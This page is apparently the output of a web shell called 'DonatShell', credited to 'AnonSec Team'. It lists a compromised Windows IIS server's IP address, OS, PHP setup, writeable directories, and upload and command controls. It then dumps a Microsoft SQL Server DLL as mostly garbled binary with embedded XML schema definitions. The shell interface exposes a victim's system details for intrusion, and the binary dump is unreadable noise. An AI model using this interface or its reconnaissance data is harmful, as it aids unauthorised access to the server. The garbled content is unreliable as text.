DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Microsoft SQL Server/100/SDK/Assemblies/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Program Files (x86)/Microsoft SQL Server/100/SDK/Assemblies/Microsoft.SqlServer.PolicyEnum.dll
MZ@	!L!This program cannot be run in DOS mode.

$PELuK!` q @ @XqS`p  H.textQ ` `.rsrcp@@.reloc@BqH\	x"8:P YB(1A\G
03;e3`Hؠڗ97UXEQxs_m68O1
|R?maʚy
*IlrH*B"2rt$ƀ璶NKt(
*(
*(
*0~rpo

J o
s

+;Jo
	-	3
+3-++,	-o
&%JXTJo
2o

,o
*
0~rpo

o
-r5po
Gs 

	X
[](o
1
o!
+r5po

,o
*fv
VrIprQp("
*(#
*r[p*<?xml version="1.0" ?>
<EnumObject type="inc_urn" impl_type="SqlObject" min_major='9'>
	<settings>
	</settings>
	<properties>
		<property name="Urn" type="nvarchar" size="600">
			<link_multiple no='3' expression="{0} + '/{2}[@Name=' + quotename({1},'''') + ']'">
				<link_field type='parent' field="Urn" />
				<link_field type='local' field="Name" />
				<link_field field="NType" />
			</link_multiple>
		</property>
	</properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="inc_urnByID" impl_type="SqlObject" min_major='9'>
	<settings>
	</settings>
	<properties>
		<property name="Urn" type="nvarchar" size="600">
			<link_multiple no='3' expression="{0} + '/{2}[@ID=' + quotename({1},'''') + ']'">
				<link_field type='parent' field="Urn" />
				<link_field type='local' field="ID" />
				<link_field field="NType" />
			</link_multiple>
		</property>
	</properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="PolicyStore" impl_type="PolicyObject" min_major='10'>
<settings>
</settings>
<properties>
    <property name="Urn" type="nvarchar" size="600">
        <link_multiple no='2' expression="'{1}[@Name=' + quotename({0},'''') + ']'">
            <link_field type='local' field="Name" />
			<link_field field="NType" />				
        </link_multiple>
    </property>
    <property name="Name" type="sysname" cast='true'>serverproperty(N'Servername')</property>
	<property name="Enabled" type="bit" cast='true'>
		(SELECT current_value FROM msdb.dbo.syspolicy_configuration WHERE name = 'Enabled')
	</property>
	<property name="HistoryRetentionInDays" type="int" cast='true'>
		(SELECT current_value FROM msdb.dbo.syspolicy_configuration WHERE name = 'HistoryRetentionInDays')
	</property>
  <property name="LogOnSuccess" type="bit" cast='true'>
    (SELECT current_value FROM msdb.dbo.syspolicy_configuration WHERE name = 'LogOnSuccess')
  </property>
</properties>
</EnumObject>
1<?xml version="1.0" ?>
<EnumObject type="Condition" impl_type="PolicyObject" min_major='10'>
	<settings>
		<property_link table='msdb.dbo.syspolicy_conditions' alias='pc'/>
	</settings>
	<properties>
		<include file='inc_urn.xml' />
		<property name='ID' type='int' access='Read'>pc.condition_id</property>
		<property name='Name' type='sysname'>pc.name</property>
		<property name='Description' type='nvarchar' size = 'max'>pc.description</property>
		<property name='Facet' type='nvarchar' size = 'max'>ISNULL(pc.facet,N'')</property>
		<property name='Expression' type='nvarchar' size = 'max'>pc.expression</property>
		<property name='CreateDate' type='datetime' access='Read'>pc.date_created</property>
		<property name='CreatedBy' type='sysname' access='Read'>pc.created_by</property>
		<property name='DateModified' type='datetime' access='Read'>pc.date_modified</property>
		<property name='ModifiedBy' type='sysname' access='Read'>pc.modified_by</property>
    <version min_major='10' max_major='10' max_minor='0' >
      <property name='IsSystemObject' type='bit' access='Read'>CAST(0 AS bit)</property>
    </version>
    <version min_major='10' min_minor='50'>
      <property name='IsSystemObject' type='bit' access='Read'>pc.is_system</property>
    </version>
  </properties>
</EnumObject>
9<?xml version="1.0" ?>
<EnumObject type="ObjectSet" impl_type="PolicyObject" min_major='10'>
	<settings>
		<property_link table='msdb.dbo.syspolicy_object_sets' alias='os'/>
	</settings>
	<properties>
		<include file='inc_urn.xml' />
		<property name='ID' type='int' access='Read'>os.object_set_id</property>
		<property name='Name' type='sysname'>os.object_set_name</property>
		<property name='Facet' type='nvarchar' size = 'max'>ISNULL(os.facet_name,N'')</property>
    <version min_major='10' max_major='10' max_minor='0' >
      <property name='IsSystemObject' type='bit' access='Read'>CAST(0 AS bit)</property>
    </version>
    <version min_major='10' min_minor='50'>
      <property name='IsSystemObject' type='bit' access='Read'>os.is_system</property>
    </version>
	</properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="Policy" impl_type="PolicyObject" min_major='10'>
	<settings>
		<property_link table='msdb.dbo.syspolicy_policies' alias='pp'/>
		<property_link fields = '#Condition#' left_join='msdb.dbo.syspolicy_conditions' alias='cond'>pp.condition_id = cond.condition_id</property_link>
    <property_link fields = '#RootCondition#' left_join='msdb.dbo.syspolicy_conditions' alias='rootcond'>pp.root_condition_id = rootcond.condition_id</property_link>
		<property_link fields = '#PolicyCategory#' left_join='msdb.dbo.syspolicy_policy_categories' alias='categories'>pp.policy_category_id = categories.policy_category_id</property_link>
    <property_link fields = '#ObjectSet#' left_join='msdb.dbo.syspolicy_object_sets' alias='objectsets'>pp.object_set_id = objectsets.object_set_id</property_link>
  </settings>
	<properties>
		<include file='inc_urn.xml' />
		<property name='ID' type='int' access='Read'>pp.policy_id</property>
		<property name='Name' type='sysname'>pp.name</property>
		<property name='Description' type='nvarchar' size = 'max'>pp.description</property>
    <property name='CreateDate' type='datetime' access='Read'>pp.date_created</property>
		<property name='ConditionID' type='int' access='Read'>pp.condition_id</property>
		<property name='Condition' type='sysname'>cond.name</property>
    <!--property name='ObjectSetID' type='int' access='Read'>pp.object_set_id</property-->
    <property name='ObjectSet' type='sysname'>ISNULL(objectsets.object_set_name, N'')</property>
    <property name='RootCondition' type='sysname'>ISNULL(rootcond.name, N'')</property>
    <property name='AutomatedPolicyEvaluationMode' type='int'>pp.execution_mode</property>
    <property name='CategoryId' type='int' access='Read'>ISNULL(pp.policy_category_id, 0)</property>
		<property name='PolicyCategory' type='sysname'>ISNULL(categories.name, N'')</property>
		<property name='Enabled' type='bit' access='Read'>pp.is_enabled</property>
		<property name='JobID' type='uniqueidentifier' access='Read'>pp.job_id</property>
		<property name='ScheduleUid' type='uniqueidentifier'>pp.schedule_uid</property>
		<property name='CreatedBy' type='sysname' access='Read'>pp.created_by</property>
		<property name='ModifiedBy' type='sysname' access='Read'>ISNULL(pp.modified_by, N'')</property>
		<property name='DateModified' type='datetime' access='Read'>pp.date_modified</property>
    <property name='HelpText' type='nvarchar' size = '4000'>pp.help_text</property>
    <property name='HelpLink' type='nvarchar' size = '2083'>pp.help_link</property>
    <!-- BEGIN Schedule properties needed to serialize the schedule -->
    <property name='Schedule' type='sysname'>N''</property>
    <property name='FrequencyTypes' type='int'>0</property>
    <property name='FrequencyInterval' type='int'>0</property>
    <property name='FrequencySubDayTypes' type='int'>0</property>
    <property name='FrequencySubDayInterval' type='int'>0</property>
    <property name='FrequencyRelativeIntervals' type='int'>0</property>
    <property name='FrequencyRecurrenceFactor' type='int'>0</property>
    <property name='ActiveStartDate' type='datetime'>null</property>
    <property name='ActiveStartTimeOfDay' type='bigint' cast='true'>0</property>
    <property name='ActiveEndTimeOfDay' type='bigint' cast='true'>0</property>
    <property name='ActiveEndDate' type='datetime'>null</property>
    <!-- END Schedule properties needed to serialize the schedule -->
    <version min_major='10' max_major='10' max_minor='0' >
      <property name='IsSystemObject' type='bit' access='Read'>CAST(0 AS bit)</property>
    </version>
    <version min_major='10' min_minor='50'>
      <property name='IsSystemObject' type='bit' access='Read'>pp.is_system</property>
    </version>
  </properties>
</EnumObject>
M<?xml version="1.0" ?>
<EnumObject type="TargetSet" impl_type="PolicyObject" min_major='10'>
	<settings>
    <parent_link>
      <link parent="ID" local="ObjectSetID" />
    </parent_link>
		<property_link table='msdb.dbo.syspolicy_target_sets' alias='ts'/>
	</settings>
	<properties>
         <property name="Urn" type="nvarchar" size="max">
   			<link_multiple no='3' expression="{0} + '/{2}[@TargetTypeSkeleton=' + quotename({1},'''') + ']'">
				<link_field type='parent' field="Urn" />
				<link_field type='local' field="TargetTypeSkeleton" />
				<link_field field="NType" />
			</link_multiple>
        </property>
		<property name='ID' type='int' access='Read'>ts.target_set_id</property>
		<property name='ObjectSetID' type='int' access='Read' hidden='true'>ts.object_set_id</property>
		<property name='TargetTypeSkeleton' type='nvarchar' size = 'max' access='Read'>ts.type_skeleton</property>
    <property name='TargetType' type='sysname' access='Read'>ts.type</property>
    <property name='Enabled' type='bit'>ts.enabled</property>
  </properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="TargetSetLevel" impl_type="PolicyObject" min_major='10'>
	<settings>
    <parent_link>
      <link parent="ID" local="TargetSetID" />
    </parent_link>
    <property_link table='msdb.dbo.syspolicy_target_set_levels' alias='cr'/>
    <property_link fields = '#Condition#' left_join='msdb.dbo.syspolicy_conditions' alias='cond'>cr.condition_id = cond.condition_id</property_link>
	</settings>
	<properties>
		<property name="Urn" type="nvarchar" size="max">
			<link_multiple no='3' expression="{0} + '/{2}[@TargetTypeSkeleton=' + quotename({1},'''') + ']'">
				<link_field type='parent' field="Urn" />
				<link_field type='local' field="TargetTypeSkeleton" />
				<link_field field="NType" />
			</link_multiple>
		</property>
		<property name='ID' type='int' access='Read'>cr.target_set_level_id</property>
		<property name='TargetSetID' type='int' access='Read' hidden='true'>cr.target_set_id</property>
		<property name='TargetTypeSkeleton' type='nvarchar' size = 'max' access='Read'>cr.type_skeleton</property>
    <property name='Condition' type='sysname'>ISNULL(cond.name,N'')</property>
    <property name='LevelName' type='sysname' access='Read'>cr.level_name</property>
  </properties>
</EnumObject>
S<?xml version="1.0" encoding="utf-8" ?>
<EnumObject type="PolicyCategorySubscription" impl_type="PolicyObject" min_major='10'>
  <settings>
    <property_link table='msdb.dbo.syspolicy_policy_category_subscriptions' alias='pgs'/>
    <property_link fields = '#PolicyCategory#' left_join='msdb.dbo.syspolicy_policy_categories' alias='categories'>pgs.policy_category_id = categories.policy_category_id</property_link>
  </settings>
  <properties>
    <include file='inc_urnByID.xml' />
    <property name='ID' type='int' access='Read'>pgs.policy_category_subscription_id</property>
    <property name='TargetType' type='sysname'>pgs.target_type</property>
    <property name='Target' type='sysname'>pgs.target_object</property>
    <property name='PolicyCategory' type='sysname'>categories.name</property>
  </properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="PolicyCategory" impl_type="PolicyObject" min_major='10'>
	<settings>
		<property_link table='msdb.dbo.syspolicy_policy_categories' alias='pc'/>
	</settings>
	<properties>
		<include file='inc_urn.xml' />
		<property name='ID' type='int' access='Read'>pc.policy_category_id</property>
		<property name='Name' type='sysname'>pc.name</property>
		<property name='MandateDatabaseSubscriptions' type='bit'>pc.mandate_database_subscriptions</property>
	</properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="EvaluationHistory" impl_type="PolicyObject" min_major='10'>
  <settings>
    <parent_link>
      <link parent="ID" local="PolicyId" />
    </parent_link>
    <property_link table='msdb.dbo.syspolicy_policy_execution_history' alias='h'/>
  </settings>
  <properties>
    <include file='inc_urnByID.xml' />
    <property name='PolicyId' type='int' access='Read'>h.policy_id</property>
    <property name='ID' type='bigint' access='Read'>h.history_id</property>
    <property name='StartDate' type='datetime' access='Read'>h.start_date</property>
    <property name='EndDate' type='datetime' access='Read'>h.end_date</property>
    <property name='Result' type='bit' access='Read'>h.result</property>
    <property name='Exception' type='nvarchar' size ='max' access='Read'>ISNULL(h.exception,N'')</property>
    <property name='PolicyName' type='sysname' access='Read'>pp.name</property>
  </properties>
</EnumObject>
<?xml version="1.0" ?>
<EnumObject type="ConnectionEvaluationHistory" impl_type="PolicyObject" min_major='10'>
  <!-- Since the local history does not have a connection table, we use the information from the execution_history table -->
  <settings>
    <parent_link>
      <link parent="ID" local="EvaluationId" />
    </parent_link>
    <property_link table='msdb.dbo.syspolicy_policy_execution_history' alias='ch'/>
  </settings>
  <properties>
    <include file='inc_urnByID.xml' />
    <property name='ID' type='bigint' access='Read'>ch.history_id</property>
    <property name='EvaluationId' type='bigint' access='Read'>ch.history_id</property>
    <property name='Result' type='bit' access='Read'>ch.result</property>
    <property name='ServerInstance' access='Read' type="sysname" cast='true'>serverproperty(N'Servername')</property>
    <property name='Exception' access='Read' type='nvarchar' size='max' cast='true'>ISNULL(ch.exception, N'')</property>
  </properties>
</EnumObject>
4<?xml version="1.0" ?>
<EnumObject type="EvaluationDetail" impl_type="PolicyObject" min_major='10'>
  <settings>
    <parent_link>
      <link parent="ID" local="HistoryId" />
    </parent_link>
    <property_link table='msdb.dbo.syspolicy_policy_execution_history_details' alias='d'/>
  </settings>
  <properties>
    <include file='inc_urnByID.xml' />
    <property name='ID' type='bigint' access='Read'>d.detail_id</property>
    <property name='HistoryId' type='bigint' access='Read'>d.history_id</property>
    <property name='TargetQueryExpression' type='nvarchar' size='max'  access='Read'>d.target_query_expression</property>
    <property name='EvaluationDate' type='datetime' access='Read'>d.execution_date</property>
    <property name='Result' type='bit' access='Read'>d.result</property>
    <property name='ResultDetail' type='nvarchar' size='max'  access='Read'>ISNULL(d.result_detail,N'')</property>
    <property name='Exception' type='nvarchar' size='max'  access='Read'>ISNULL(d.exception,N'')</property>
  </properties>
</EnumObject>
BSJBv2.0.50727l#~#Strings#US0#GUID@#BlobW_	3##

vv

H"~




8
S
l



;
pQ




g
F&
f&v~


A5
O
{-:]:
b
'V	:VNV$NV1NV>NVF:V[:Vm:V:V:V:V:V:V:V!:V7:VLV^Vz:  V g +!4f"gP"n"	AgIgQgYgagigqgygggggggggggg!V	g1	1%	gV	`gr19g91g=QV[`e p$(,048<"@ADR	H	L`P...#0.+~.3.;.K.S.[.c.s.{....%m"

v


~

8`#%(8,W(.j26<Module>Microsoft.SqlServer.PolicyEnum.dllPolicyObjectMicrosoft.SqlServer.Management.DmfUtilAssemblyVersionInfoMicrosoft.SqlServer.Management.Sdk.SfcSqlObjectISupportVersionsmscorlibSystemObjectSystem.ReflectionAssemblyget_ResourceAssemblyMicrosoft.SqlServer.ConnectionInfoMicrosoft.SqlServer.Management.CommonServerVersionGetServerVersion.ctorResourceAssemblyMicrosoft.SqlServer.Diagnostics.STraceTraceContexttraceContextUnEscapeStringSystem.Collections.SpecializedStringCollectionSplitNamesVersionStringMajorVersionMinorVersionBuildVersionSPLevelProductVersionStringProductNameStringProductNameBrandingStringProductNameShortcutBrandingStringVersionLocationStringProductVersionLocationStringVersionHelpKeywordPrefixVersionHelpSettingsTokenSetupSupportFolderMaxMaintenanceVersionSqlProductFamilyCodeevalTimeBombValuecurrentReleaseTimeBombValueVersionBIDSHelpNamespaceget_VersionHelpNamespaceVersionHelpNamespaceAssemblyInformationalVersionAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeSystem.DataSystem.Data.SqlClientSqlClientPermissionAttributeSystem.Security.PermissionsSecurityActionAssemblyKeyNameAttributeSystem.ResourcesNeutralResourcesLanguageAttributeCLSCompliantAttributeSystem.Runtime.InteropServicesComVisibleAttributeAssemblyCultureAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeSystem.DiagnosticsDebuggableAttributeDebuggingModesSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeMicrosoft.SqlServer.PolicyEnumGetExecutingAssemblyconnExecuteSqlescapedValuestartEscapeCharescapeCharindexMethodTraceContextGetMethodContextCharInt32TraceParametersSystem.TextStringBuilderStringget_CharsAppendget_LengthToStringIDisposableDisposenameTraceParameterOutInsert.cctorGetTraceContextinc_urn.xmlinc_urnByID.xmlPolicyStore.xmlCondition.xmlObjectSet.xmlPolicy.xmlTargetSet.xmlTargetSetLevel.xmlPolicyCategorySubscription.xmlPolicyCategory.xmlEvaluationHistory.xmlConnectionEvaluationHistory.xmlEvaluationDetail.xmlUnEscapeStringSplitNamesreturnValDMF	Util-ms-help://MS.SQLCC.v101ĒE..k]̀̑z\V4   (10.0.0.0
2@
10.50(Microsoft SQL Server8Microsoft SQL Server 2008 R21001050sql1052SQLServerBooksOnline.10.0SQLServer2008R211.0.0.0L{20E42995-BBE9-4697-8394-FCDC4338706B}	*ms-help://MS.VSCC.v90  A  i $$RSA1''6n_1:fl/y2}/R4H<=\]Ǽ(k,Q\$+Au2IRmRo{l؂O1
ˢ#V{-Pb왹J|};( y     
y  y10.50.1600.1)$10.50.1600.1 ((KJ_RTM).100402-1540 )MHMicrosoft SQL Server is a registered trademark of Microsoft Corporation.)$Microsoft Corp. All rights reserved.Microsoft SQL ServerMicrosoft Corporation
en-USTWrapNonExceptionThrows.System.Data.SqlClient.SqlClientPermissionAttribute, System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TUnrestricteduK;p`RSDSIBTWaMicrosoft.SqlServer.PolicyEnum.pdbqq q_CorDllMainmscoree.dll% @0HX4VS_VERSION_INFO2
@2
@?DVarFileInfo$TranslationStringFileInfo000004b0LCompanyNameMicrosoft Corporation,FileDescription l%FileVersion10.50.1600.1 ((KJ_RTM).100402-1540 )h#InternalNameMicrosoft.SqlServer.PolicyEnum.dllp%LegalCopyrightMicrosoft Corp. All rights reserved.ILegalTrademarksMicrosoft SQL Server is a registered trademark of Microsoft Corporation.p#OriginalFilenameMicrosoft.SqlServer.PolicyEnum.dllLProductNameMicrosoft SQL Server@
ProductVersion10.50.1600.1<	Assembly Version10.0.0.0p1`0S	*H
D0@10	+0h
+7Z0X03
+70% <<<Obsolete>>>0!0	+pbR~KkO10`0L
.P\0	+0p1+0)U"Copyright (c) 1997 Microsoft Corp.10UMicrosoft Corporation1!0UMicrosoft Root Authority0
070822223102Z
120825070000Z0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA0"0
	*H
0
y}]E941%5IwEqFԌkLRbMIl/$>e#HuEP%+
#A$bEJͳ/"J-|o;99ݽ)f;-2'Hlc\򸔣8P'N0==l9.4.
}bxfs
 Oc,2EJ;PSfQyV>Pn5{$Rf=N+~3nGўJnS00U%0
+0U0[pir#Q~Mˡr0p1+0)U"Copyright (c) 1997 Microsoft Corp.10UMicrosoft Corporation1!0UMicrosoft Root Authority<<>c@0U00Uvp[NQD.Dc0U0	+{~J&μNtX't*uLxMi|CʇSŸVocDDȚ
)}s9=j8m҈#i	4|.)Bk(q8
]hͽAkf4|zB{
p֒O8|-=4b7j#\cZ9`U3;_,˫ 0 
*RA^0(ip΀Brv0z0b
a>0
	*H
0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA0
091207224029Z
110307224029Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR10UMicrosoft Corporation0"0
	*H
0
0ErSkO#=Y@8s&S<B8auM\F^i[s)DdY/]nǫ9eħuꇗ&&v89&+ZT!򗍇)I,?}͖
qB5׸?ݎE
}K[vrw#}5]PKGmUTN؁B1U
SI0奈|^zZ7i2$00U%0
+0U8xs2_Uƙt0U0U#0vp[NQD.Dc0DU=0;09753http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H+<0:08+0,http://www.microsoft.com/pki/certs/CSPCA.crt0
	*H
(
oBvCB$e4uq0r7:pQ q(ps{V4ZrN
{DOaun+Z
9`jT;1_,nM*v{Ƈֱ*rTn*ȞobKk=/zw9gj{cI&Bޕ"_s2r6)$ROfH&9iPNl.r!m$H@|t8JO00jO%EXzg0
	*H
0p1+0)U"Copyright (c) 1997 Microsoft Corp.10UMicrosoft Corporation1!0UMicrosoft Root Authority0
060916010447Z
190915070000Z0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Timestamping PCA0"0
	*H
0
7nBJqH>S,2ORȃ>3I1(dPKuǨծipfx'f趷Y")/@VvmdmJT޿ǀL7VhGv\/}%V[jc|<%M9wt]\؆7,u9	|vlnz>q_*Ob`2҃N+"\hE/Pl%ׅvs6ƕz`3[AXn,HoCj&k(0$0U%0
+0U0[pir#Q~Mˡr0p1+0)U"Copyright (c) 1997 Microsoft Corp.10UMicrosoft Corporation1!0UMicrosoft Root Authority<<>c@0	+70UoN?4K;AC0	+7
SubCA0U0U00
	*H
M1|PapEsT?	-QS9Vތ;ɷQ!oi~k"Flm|"Fӄ6~p]Eݎ*|ɮ2Շc6!v;s!شTeJ(&`;exHϭ:ObX099!dcC/{FeJtn̝(a|H!8Ŗ2@S=f7"̰wTQ:rD#00
a-	0
	*H
0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Timestamping PCA0
080725190217Z
130725191217Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher DSE ESN:7A82-688A-9F921%0#UMicrosoft Time-Stamp Service0"0
	*H
0

 BQzٕ܇7(vMPv*GVi~MquۻCloq+|Δź~a-0&-v?F؉7[hd֋=vP'`]),<ϥZ5O8a?=6Vw;]7'c,HUl+~w$*p*$Ţ"KLYwTrC>dݓXI	63~Ly2Y)<?F;00U(;ڔ}F~0U#0oN?4K;AC0DU=0;09753http://crl.microsoft.com/pki/crl/products/tspca.crl0H+<0:08+0,http://www.microsoft.com/pki/certs/tspca.crt0U%0
+0U0
	*H
҈f)Z~\$Ykׇ˵v"ʴA7H7p3(t(u*	Oߘ?4ܺdNP;L%ՖKA]W}vzo _0$~a))I:CՃO,5;AAIB{-])ᾍv`'ocB(X:;@̒WFVk˒MV0@EN(Qw&	:E1000y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA
a>0	+0	*H
	1
+70
+710
+70#	*H
	1NE ~1x$UcŅ0X
+71J0H&$SQL Server 2008 R2http://www.microsoft.com/sql0
	*H
f3H$L>uh+$FvwF,}taA0#@3/}j@>Ճ61(wwM?F}&ʿx0v@0ȻzHƹ'6[x1Ԧ#  0 
o`;fi僥!/&0o4.AJB"f(]]i
 [;J,R"Z֤
d"ʢw5YdQh\=i?{(҃'ٛo+0	*H
	1000y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Timestamping PCA
a-	0+]0	*H
	1	*H
0	*H
	1
100402235600Z0#	*H
	1PTg.:o9H0
	*H
\Gr~F4n8N8}lviknbi:/ɗGWx)aP
?t<P	0¯SjX5͓Iqhc#޼ |xMk@$?=]}*n9[ۤ@sz.`.ԉ$lXʓP!P"QHhɉg$]/\	FE
=9ey׮dvj<Ad$gfK\rGNG׹Vl

Anon7 - 2022
AnonSec Team